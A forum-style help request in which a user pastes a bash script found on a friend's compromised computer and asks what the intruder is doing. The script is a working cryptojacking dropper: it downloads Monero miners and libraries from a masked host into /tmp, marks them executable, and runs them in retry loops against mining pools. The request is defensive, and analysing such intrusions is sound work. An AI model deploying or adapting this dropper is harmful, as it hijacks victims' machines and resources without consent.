Hello,
I've found someone's footprints on my friend's computer.
Could you please explain what is this guy doing ?
I see Chinese ip addresses in log files.
#!/bin/bash
#trap 'kill -9 $PID 2>/dev/null' EXIT
echo "Downloading libraries." 1>&2
wget http://***masked_ip***/minergate-cli -O /tmp/minergate-cli
wget http://***masked_ip***/libQt5Core.so.5 -O /tmp/libQt5Core.so.5
wget http://***masked_ip***/libQt5Network.so.5 -O /tmp/libQt5Network.so.5
wget http://***masked_ip***/libQt5WebSockets.so.5 -O /tmp/libQt5WebSockets.so.5
wget http://***masked_ip***/libcudart.so.6.5 -O /tmp/libcudart.so.6.5
wget http://***masked_ip***/yam -O /tmp/yam
wget http://***masked_ip***/yam32 -O /tmp/yam32
wget http://***masked_ip***/minerd_arm -O/tmp/minerd_arm
#/usr/bin/wget http://***masked_ip***/minergate-cli -qO /tmp/minergate-cli
#/usr/bin/wget http://***masked_ip***/libQt5Core.so.5 -qO /tmp/libQt5Core.so.5
#/usr/bin/wget http://***masked_ip***/libQt5Network.so.5 -qO /tmp/libQt5Network.so.5
#/usr/bin/wget http://***masked_ip***/libQt5WebSockets.so.5 -qO /tmp/libQt5WebSockets.so.5
#/usr/bin/wget http://***masked_ip***/libcudart.so.6.5 -qO /tmp/libcudart.so.6.5
#/usr/bin/wget http://***masked_ip***/yam -qO /tmp/yam
#/usr/bin/wget http://***masked_ip***/yam32 -qO /tmp/yam32
echo "Fixing permissions." 1>&2
chmod +x /tmp/minergate-cli
chmod +x /tmp/yam
chmod +x /tmp/yam32
chmod +x /tmp/minerd_arm
#/bin/chmod +x /tmp/minergate-cli
#/bin/chmod +x /tmp/yam
#/bin/chmod +x /tmp/yam32
cat /proc/cpuinfo | grep "model name" 1>&2
threads=`cat /proc/cpuinfo | grep "cache size" | tail -n 1 | sed 's/.*: //g' | sed 's/ KB//g' | xargs -I{} expr {} / 1024 / 2 - 1`
if [ -z "$threads" ]; then threads=1; fi
LD_PRELOAD="/tmp/libQt5Core.so.5 /tmp/libQt5Network.so.5 /tmp/libQt5WebSockets.so.5 /tmp/libcudart.so.6.5" \
/tmp/minergate-cli -user ***email_address___*** -xmr $threads &
PID=$!
wait $PID
echo "Trying MG." 1>&2
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
LD_PRELOAD="/tmp/libQt5Core.so.5 /tmp/libQt5Network.so.5 /tmp/libQt5WebSockets.so.5 \
/tmp/libcudart.so.6.5" /tmp/minergate-cli -user ***masked_email_address*** -xmr $threads &
PID=$!
wait $PID
done
echo "Trying YAM" 1>&2
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
/tmp/yam -t $1 -c 1 -M stratum+tcp://***masked_email_address***:x@xmr.pool.minergate.com:45560/xmr 1>&2 &
PID=$!
wait $PID
done
echo "Trying YAM32" 1>&2
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
/tmp/yam32 -t $1 -c 1 -M stratum+tcp://***masked_email_address***:x@xmr.pool.minergate.com:45560/xmr 1>&2 &
PID=$!
wait $PID
done
wget http://***masked_ip***/libjansson.so.4 -O /tmp/libjansson.so.4
wget http://***masked_ip***/libcrypto.so.1.0.0 -O /tmp/libcrypto.so.1.0.0
wget http://***masked_ip***/libcurl.so.4 -O /tmp/libcurl.so.4
wget http://***masked_ip***/libidn.so.11 -O /tmp/libidn.so.11
wget http://***masked_ip***/librtmp.so.1 -O /tmp/librtmp.so.1
wget http://***masked_ip***/libgnutls-deb0.so.28 -O /tmp/libgnutls-deb0.so.28
wget http://***masked_ip***/libp11-kit.so.0 -O /tmp/libp11-kit.so.0
wget http://***masked_ip***/libffi.so.6 -O /tmp/libffi.so.6
wget http://***masked_ip***/libtasn1.so.6 -O /tmp/libtasn1.so.6
wget http://***masked_ip***/libnettle.so.4 -O /tmp/libnettle.so.4
wget http://***masked_ip***/libhogweed.so.2 -O /tmp/libhogweed.so.2
wget http://***masked_ip***/libgmp.so.10 -O /tmp/libgmp.so.10
wget http://***masked_ip***/libssh2.so.1 -O /tmp/libssh2.so.1
wget http://***masked_ip***/libssl.so.1.0.0 -O /tmp/libssl.so.1.0.0
wget http://***masked_ip***/libgssapi_krb5.so.2 -O /tmp/libgssapi_krb5.so.2
wget http://***masked_ip***/libkrb5.so.3 -O /tmp/libkrb5.so.3
wget http://***masked_ip***/libk5crypto.so.3 -O /tmp/libk5crypto.so.3
wget http://***masked_ip***/libkrb5support.so.0 -O /tmp/libkrb5support.so.0
wget http://***masked_ip***/libkeyutils.so.1 -O /tmp/libkeyutils.so.1
wget http://***masked_ip***/libcom_err.so.2 -O /tmp/libcom_err.so.2
wget http://***masked_ip***/liblber-2.4.so.2 -O /tmp/liblber-2.4.so.2
wget http://***masked_ip***/libldap_r-2.4.so.2 -O /tmp/libldap_r-2.4.so.2
wget http://***masked_ip***/libsasl2.so.2 -O /tmp/libsasl2.so.2
echo "Trying ARM minerd" 1>&2
count=0
while [ "$count" -lt "10" ]
do
count=$((count+1))
#LD_PRELOAD="/tmp/libsasl2.so.2 /tmp/libldap_r-2.4.so.2 /tmp/liblber-2.4.so.2 /tmp/libcom_err.so.2 /tmp/libkeyutils.so.1 \
/tmp/libkrb5support.so.0 /tmp/libk5crypto.so.3 /tmp/libkrb5.so.3 /tmp/libgssapi_krb5.so.2 /tmp/libssl.so.1.0.0 /tmp/libssh2.so.1 \
/tmp/libgmp.so.10 /tmp/libhogweed.so.2 /tmp/libnettle.so.4 /tmp/libtasn1.so.6 /tmp/libffi.so.6 /tmp/libp11-kit.so.0 /tmp/libgnutls-deb0.so.28 \
/tmp/librtmp.so.1 /tmp/libidn.so.11 /tmp/libcurl.so.4 /tmp/libjansson.so.4 /tmp/libcrypto.so.1.0.0" /tmp/minerd_arm -a cryptonight \
-o stratum+tcp://***other_suspicious_ip***:8080 -u 123456 -p 1 -t 2
PID=$!
wait $PID
done
sleep 60
Thanks
Boris